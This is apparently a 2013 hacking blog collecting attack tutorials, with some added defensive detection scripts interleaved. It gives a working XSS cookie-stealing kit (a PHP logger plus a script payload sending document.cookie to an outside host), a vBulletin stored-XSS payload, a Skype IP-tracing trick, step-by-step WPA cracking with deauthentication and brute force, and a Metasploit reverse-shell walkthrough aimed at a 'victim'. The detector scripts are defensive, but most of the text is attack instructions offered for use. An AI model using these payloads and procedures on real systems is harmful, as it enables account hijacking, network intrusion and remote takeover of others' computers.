Sunday 2 June 2013

How to grab cookies using XSS

Let's work: first, register a free hosting account. You can try one of these sites: http://www.funpic.de ; http://www.altervista.org ; http://www.netsons.org . After registration and activation, we need to upload these two PHP pages to the site.
vb.php
<head>
<meta http-equiv="Content-Language" content="it">
<title>Cookies Stealther - Designed and programmed by R00t[ATI]</title>
</head>

<body bgcolor="#C0C0C0">

<p align="center"><font color="#FF0000">COOKIES STEALTHER</font></p>
<p align="center"><font face="Arial" color="#FF0000">By R00T[ATI]</font></p>
<p align="left">&nbsp;</p>

</body>

documents.php
<?php
// Records the requester's metadata plus the "c" query parameter, appends it to vb.php, then redirects away.
$ip      = $_SERVER['REMOTE_ADDR'];
$referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';       // header may be absent
$agent   = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';

$data = isset($_GET['c']) ? $_GET['c'] : '';   // original had $_GET[c]; the array key must be quoted

$time = date("Y-m-d G:i:s A");
$text = "<br><br>".$time." = ".$ip."<br><br>User Agent: ".$agent."<br>Referer: ".$referer."<br>Session: ".$data."<br><br><br>";

$file = fopen('vb.php', 'a');   // append mode, so every visit adds a new entry to vb.php
fwrite($file, $text);
fclose($file);
header("Location: http://www.google.com");

?>
vb.php is used to SHOW the attacker which cookies were grabbed, along with the other recorded information.
documents.php is used to GRAB information from the victim, such as IP address, user agent and, naturally, cookies.
Now we need to find a site vulnerable to Cross Site Scripting (XSS). Then inject a script that calls documents.php, passing document.cookie in the "c" parameter: documents.php?c="+document.cookie;
For example: http://vulnerable-site.com/vulnerable_page.php?vulnerable_method=<script>document.location="http://syshack.sy.funpic.de/documents.php?c="+document.cookie;</script>
The victim is redirected to http://www.google.com (edit this in documents.php), and the attacker can see the victim's cookies on vb.php.
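From the defender's side, the pattern above leaves a clear trace in the web server's access log: a request whose query string decodes to a <script> tag or to the string document.cookie. The following is an added example, not code from the original post; the log lines are constructed in Apache combined format, and the hostname attacker.example is a placeholder.

```python
"""Added example (not from the original post): scan access-log lines for the
reflected-XSS cookie-theft pattern, i.e. a query string that decodes to a
<script> tag, document.cookie, or an inline event handler."""
import re
from urllib.parse import unquote_plus

# Constructed sample lines in Apache combined format (not real traffic).
SAMPLE_LOG = '''
203.0.113.5 - - [02/Jun/2013:10:01:02 +0200] "GET /vulnerable_page.php?vulnerable_method=hello HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [02/Jun/2013:10:01:07 +0200] "GET /vulnerable_page.php?vulnerable_method=%3Cscript%3Edocument.location%3D%22http%3A%2F%2Fattacker.example%2Fdocuments.php%3Fc%3D%22%2Bdocument.cookie%3B%3C%2Fscript%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.2 - - [02/Jun/2013:10:02:11 +0200] "GET /calendar.php?title=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(1)%3E HTTP/1.1" 200 300 "-" "Mozilla/5.0"
'''

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Markers for the two injection styles shown on this page, matched on the decoded query.
MARKERS = (re.compile(r'<\s*script', re.I),
           re.compile(r'document\.cookie', re.I),
           re.compile(r'on(error|load)\s*=', re.I))

def decode_query(path):
    """Return the URL-decoded query string ('' if none). Decoding twice also
    catches the common double-encoded variant."""
    _, _, query = path.partition('?')
    return unquote_plus(unquote_plus(query))

def flag_xss_attempts(log_text):
    """Return (ip, timestamp, matched_patterns) for every suspicious request."""
    hits = []
    for line in log_text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # skip lines that are not access-log records
        decoded = decode_query(m['path'])
        matched = [p.pattern for p in MARKERS if p.search(decoded)]
        if matched:
            hits.append((m['ip'], m['ts'], matched))
    return hits

if __name__ == '__main__':
    for ip, ts, why in flag_xss_attempts(SAMPLE_LOG):
        print(f'{ts} {ip} matched {why}')
```

Marking session cookies HttpOnly keeps document.cookie from exposing them even when such an injection succeeds; the log check above still tells you the page is vulnerable.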

Sangteamtham/vBulletin 4.2.0 Cross Site Scripting

$------------------------------------------------------------------------------------------------------------
$ vBulletin 4.2.0 XSS Vulnerability
$ Author : hackersmeet
$*************************************************************************************************************
1.vBulletin Description:
 
 Content publishing, search, security, and more— vBulletin has it all.
 Whether it’s available features, support, or ease-of-use, vBulletin offers the most for your money.
 Learn more about what makes vBulletin the choice for people who are serious about creating
 thriving online communities.
 
2. Vulnerability Description:
 
To steal cookies from the administrator or any member of a forum, or drive them to malicious sites, the attacker will first create an account, then go to the
calendar section and create an event for himself.
 
In the title, he will inject XSS code. For example:
 
"><img src=x onerror=alert(1)>
 
In the content section, he will write whatever he likes. Now he will send his profile to the Administrator or any member
and wait for cookies or victims' infection.
 
 
3. Patch:
 
June 13, 2012: Contacted the vendor.
June 14, 2012: Vendor replied to me.
June 18, 2012: the vendor released the patch for this vulnerability. Please download it from the Member Area right now.
 
 
$**************************************************************************************************************
$ Greetz to: All Vietnamese hackers and Hackers out there researching for more security
$
$
$---------------------------------------------------------------------------------------------------------------

FileIce.net Downloader 100% working Bypass Survey (Mediafire link)

Today I am going to share the latest fileice.net downloader with you; by using this tool you can convert any fileice.net link into a premium one. Just enter the URL of the file and a new link will appear; click on the download button. Enjoy.



FileIce.net Downloader 100% working Bypass Survey (Mediafire link): link broken

How to Resolve a Skype IP Address (Alternative method)

1. Call whoever's IP you want to resolve
2. Go to CMD and type netstat -nb
3. Take note of the list of IPs for Skype
4. Start a file transfer with them
5. Type netstat -nb in CMD again
6. The new IP on the list of IPs for Skype is their IP

Saturday 1 June 2013

SYN flood

A SYN flood occurs when a host sends a flood of TCP/SYN packets, often with a forged sender address. Each of these packets is handled like a connection request, causing the server to create a half-open connection: it sends back a TCP/SYN-ACK packet (acknowledgement) and waits for the final ACK of the handshake from the sender address. However, because the sender address is forged, that response never comes. These half-open connections saturate the number of connections the server is able to hold, keeping it from responding to legitimate requests until the attack ends.
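The half-open connections described above are visible on the server as sockets in the SYN-RECV state. The following added example (not from the original post) counts them per local port and per peer address from a constructed snapshot in the column layout of `ss -tan`, which is the quickest way to confirm a flood in progress.

```python
"""Added example (not from the original post): detect a SYN flood from the
server side by counting half-open (SYN-RECV) sockets in `ss -tan` output."""
from collections import Counter

# Constructed snapshot, same columns as `ss -tan` (State Recv-Q Send-Q Local Peer).
SAMPLE_SS = """\
State      Recv-Q Send-Q Local Address:Port   Peer Address:Port
LISTEN     0      128    0.0.0.0:80           0.0.0.0:*
ESTAB      0      0      192.0.2.10:80        198.51.100.7:51022
SYN-RECV   0      0      192.0.2.10:80        203.0.113.11:40001
SYN-RECV   0      0      192.0.2.10:80        203.0.113.12:40002
SYN-RECV   0      0      192.0.2.10:80        203.0.113.13:40003
SYN-RECV   0      0      192.0.2.10:80        203.0.113.14:40004
SYN-RECV   0      0      192.0.2.10:22        198.51.100.9:60000
"""

def parse_ss(text):
    """Yield (state, local_port, peer_ip) for each socket line, skipping the header."""
    for line in text.splitlines()[1:]:
        cols = line.split()
        if len(cols) < 5:
            continue
        state, local, peer = cols[0], cols[3], cols[4]
        yield state, local.rsplit(':', 1)[1], peer.rsplit(':', 1)[0]

def half_open_by_port(text):
    """Number of SYN-RECV sockets per local port."""
    return Counter(port for st, port, _ in parse_ss(text) if st == 'SYN-RECV')

def distinct_sources(text, port):
    """Distinct peer addresses holding a half-open slot on `port`. A flood with
    forged sources shows many peers, none of which completes the handshake."""
    return len({ip for st, p, ip in parse_ss(text) if st == 'SYN-RECV' and p == port})

def syn_flood_suspected(text, threshold):
    """Ports whose half-open count reaches `threshold` (tune it to your listen backlog)."""
    return sorted(p for p, n in half_open_by_port(text).items() if n >= threshold)

if __name__ == '__main__':
    print(half_open_by_port(SAMPLE_SS), syn_flood_suspected(SAMPLE_SS, 4))
```

On Linux the standard mitigation is SYN cookies (`net.ipv4.tcp_syncookies=1`), which lets the kernel answer SYNs without keeping per-connection state until the final ACK arrives.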

HACK WIFI PASSWORD WITH BACKTRACK 5

WARNING: Don't hack any router you are not authorized to test, otherwise you'll be put in jail.
  
Rules to Follow

    • A BackTrack Live CD, the Linux Live CD that lets you do all sorts of security testing and tasks. Download yourself a copy of the CD and burn it, or load it up in VMware to get started.
    • Here is a link to download it: http://www.backtrack-linux.org/downloads/
    • A nearby WEP-enabled Wi-Fi network
    • Patience with the command line. This is a ten-step process that requires typing in long, arcane commands and waiting around for your Wi-Fi card to collect data in order to crack the password. Like the doctor said to the short person, be a little patient.

     Steps to Follow:
    Step 1 :
    airmon-ng

    The result will be something like :
    Interface    Chipset      Driver
    wlan0        Intel 5100   iwlagn - [phy0]



    Step 2 :
    airmon-ng start wlan0

    Step 3 (Optional) :

    Change the mac address of the mon0 interface.
    ifconfig mon0 down
    macchanger -m 00:11:22:33:44:55 mon0
    ifconfig mon0 up


    Step 4 :
    airodump-ng mon0

    Then, press "Ctrl+c" to break the program.

    Step 5 :
    airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0

    *where -c is the channel
               -w is the file to be written
               --bssid is the BSSID

    This terminal is keeping running.

    Step 6 :

    open another terminal.
    aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

    *where -a is the BSSID
               -c is the client MAC address (STATION)

    Wait for the handshake.

    Step 7 :

    Use the John the Ripper word list to crack the WPA/WPA2 password.
    aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs

    Step 8 (Optional) :

    If you do not want to use John the Ripper as word list, you can use Crunch.

    Go to the official site of crunch.
    http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

    Download crunch 3.0 (the current version at the time of this writing).
    http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download
    tar -xvzf crunch-3.0.tgz
    cd crunch-3.0
    make
    make install

    /pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -

    *where 
    8 16 is the length of the password, i.e. from 8 characters to 16 characters.

    (B) nVidia Display Card with CUDA

    If you have an nVidia card with CUDA, you can use pyrit together with crunch to crack the password.

    Step a :
    airmon-ng

    The result will be something like :
    Interface    Chipset      Driver
    wlan0        Intel 5100   iwlagn - [phy0]



    Step b :
    airmon-ng start wlan0

    Step c (Optional) :

    Change the mac address of the mon0 interface.
    ifconfig mon0 down
    macchanger -m 00:11:22:33:44:55 mon0
    ifconfig mon0 up


    Step d :
    airodump-ng mon0

    Then, press "Ctrl+c" to break the program.

    Step e :
    airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0

    Step f :

    open another terminal.
    aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

    *where -a is the BSSID
               -c is the client MAC address (STATION)

    Wait for the handshake.

    Step g :

    If the following programs are not yet installed, please do it.
    apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy

    Step h :

    Go to the official site of crunch.
    http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

    Download crunch 3.0 (the current version at the time of this writing).
    http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download
    tar -xvzf crunch-3.0.tgz
    cd crunch-3.0
    make
    make install


    Step i :

    Go to the official site of pyrit.
    http://code.google.com/p/pyrit/downloads/list

    Download pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing).
    tar -xzvf pyrit-0.4.0.tar.gz
    cd pyrit-0.4.0
    python setup.py build
    sudo python setup.py install

    tar -xzvf cpyrit-cuda-0.4.0.tar.gz
    cd cpyrit-cuda-0.4.0
    python setup.py build
    sudo python setup.py install


    Step j :
    /pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

    *where 
    8 16 is the length of the password, i.e. from 8 characters to 16 characters.

    Step k (Optional) :

    If you encounter an error when reading wpacrack-01.cap, do the following step.
    pyrit -r wpacrack-01.cap -o new.cap stripLive
    /pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

    *where 
    8 16 is the length of the password, i.e. from 8 characters to 16 characters.

    Step l :

    Then, you will see something similar to the following.
    Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
    This code is distributed under the GNU General Public License v3+

    Parsing file 'new.cap' (1/1)...
    Parsed 71 packets (71 802.11-packets), got 55 AP(s)

    Tried 17960898 PMKs so far; 17504 PMKs per second.


    Remarks :

    If you have an nVidia GeForce GTX460 (336 CUDA cores), the speed of cracking is about 17,000 passwords per second.

    To test if your wireless card (either USB or PCI-e) can do the injection or not :
    airodump-ng mon0
    Open another terminal.
    aireplay-ng -9 mon0
    Make sure pyrit works on your system :
    pyrit list_cores
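The aireplay-ng -0 step in the procedure above works by sending deauthentication frames to the client so that it reconnects and the handshake can be captured; a wireless IDS catches it by counting deauth frames per sender. The following is an added example, not code from the original post: a minimal 802.11 frame-control parser run over constructed frames (the AP address is made up, the client address is the post's placeholder).

```python
"""Added example (not from the original post): count 802.11 deauthentication /
disassociation frames per sender, the basic wireless-IDS check for a deauth burst.
All frames below are constructed in memory; nothing is captured or transmitted."""
import struct
from collections import Counter

MGMT_TYPE, DISASSOC, DEAUTH = 0, 10, 12   # frame type 0 = management; subtypes 10 and 12

def mac_bytes(text):
    return bytes.fromhex(text.replace(':', ''))

def mac_text(raw):
    return ':'.join(f'{b:02x}' for b in raw)

def build_frame(fc_byte0, addr1, addr2, addr3, body=b''):
    """Minimal 802.11 MAC header: frame control(2) duration(2) addr1 addr2 addr3 seq(2), then body."""
    return (bytes([fc_byte0, 0]) + b'\x00\x00' + mac_bytes(addr1) + mac_bytes(addr2)
            + mac_bytes(addr3) + b'\x00\x00' + body)

# Constructed addresses: AP is invented, CLIENT is the placeholder used in the post.
AP, CLIENT, BCAST = 'aa:bb:cc:dd:ee:01', '99:88:77:66:55:44', 'ff:ff:ff:ff:ff:ff'
SAMPLE_FRAMES = (
    [build_frame(0x80, BCAST, AP, AP)]                                   # beacon (mgmt, subtype 8)
    + [build_frame(0x08, CLIENT, AP, AP, b'data')]                        # data frame (type 2)
    + [build_frame(0xC0, CLIENT, AP, AP, struct.pack('<H', 7))] * 12      # 12 deauths, reason code 7
)

def parse_frame(raw):
    """Return (type, subtype, sender addr2, reason_code or None) from the first 26 bytes."""
    fc0 = raw[0]
    ftype, subtype = (fc0 >> 2) & 0x3, fc0 >> 4          # bits 2-3 type, bits 4-7 subtype
    sender = mac_text(raw[10:16])
    reason = None
    if ftype == MGMT_TYPE and subtype in (DEAUTH, DISASSOC) and len(raw) >= 26:
        reason = struct.unpack_from('<H', raw, 24)[0]    # reason code follows the 24-byte header
    return ftype, subtype, sender, reason

def deauth_counts(frames):
    """Deauth/disassoc frames seen per sender address in this window."""
    return Counter(s for t, st, s, _ in map(parse_frame, frames)
                   if t == MGMT_TYPE and st in (DEAUTH, DISASSOC))

def flooding_senders(frames, threshold=5):
    """Senders whose deauth count reaches `threshold`; a legitimate AP rarely sends
    more than a handful in a short interval, so tune the threshold to your traffic."""
    return sorted(s for s, n in deauth_counts(frames).items() if n >= threshold)

if __name__ == '__main__':
    print(deauth_counts(SAMPLE_FRAMES), flooding_senders(SAMPLE_FRAMES))
```

Networks that enable 802.11w (protected management frames) authenticate deauth frames, so a forged burst like this one is simply ignored by the client.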

    Hacking windows 7 using metasploit

    Things you will need ---->

    1. Backtrack OS or Metasploit.
    2. A victim
    3. Brain(important thing lol)

    Let's start the shit ---->

    1. Open a terminal, type msfconsole and hit enter. Metasploit will open as in the image.

    2. Now type use exploit/multi/browser/java_signed_applet and hit enter.

    3. Type set payload windows/meterpreter/reverse_tcp and hit enter.

    4. Type set lhost 223.185.18.74 (must change 223.185.18.74 with your ip address)

    5. Now type set lport 443 and hit enter.

    6. Now type set srvport 80 and hit enter.

    7. Now type set uripath cybersucks and hit enter. (You may change cybersucks to your desired one.)

    8. At last type exploit and hit enter. See image below

    9. Now send http://youripaddress:80/cybersucks to your victim.

    10. Now, when the victim opens it, he/she will be hacked.

    11. Now see hacked sessions by typing sessions -l